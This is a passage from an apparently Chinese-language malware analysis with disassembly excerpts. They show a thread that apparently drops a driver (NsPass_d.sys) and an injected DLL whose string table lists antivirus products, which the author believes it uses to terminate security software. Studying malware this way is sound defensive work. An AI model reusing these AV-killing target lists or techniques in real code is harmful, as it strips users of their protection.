.text:71001EAC                 jbe     short loc_71001E3D
.text:71001EAE                 pop     edi
.text:71001EAF                 pop     esi


14、释放驱动（以 NsPass_d_sys 例程为线程函数调用 CreateThread_0；从符号名推测释放的是 NsPass_d.sys，与第 2 节可能是同一处；释放路径和内容需看线程函数本身）


push    offset NsPass_d_sys ; lpStartAddress
call    CreateThread_0


15、appwinproc.dll 主要是 kill AV：这是注入到 explorer.exe 的 DLL（基址 0x10000000）中的字符串表，包含 "McAfee"、"超级巡警"、"360安全卫士"、"奇虎"、"杀毒"、"木马"、"专杀"、"下载者"、"NOD32" 等，推测用于匹配窗口标题或进程名后结束相应程序（匹配逻辑不在片段内，表在此处也未列完）。


.data:10003004                 dd offset aMcafee       ; "McAfee"
.data:10003008                 dd offset aMP           ; "超级巡警"
.data:1000300C                 dd offset a360L         ; "360安全卫士"
.data:10003010                 dd offset aCV           ; "奇虎"
.data:10003014                 dd offset unk_10002074
.data:10003018                 dd offset asc_1000206C  ; "杀毒"
.data:1000301C                 dd offset aA            ; "木马"
.data:10003020                 dd offset aI            ; "专杀"
.data:10003024                 dd offset asc_10002054  ; "下载者"
.data:10003028                 dd offset unk_10002048
.data:1000302C                 dd offset aNod32        ; "NOD32"
.data:10003030                 dd offset unk_10002034
.data:10003034                 dd offset unk_10002028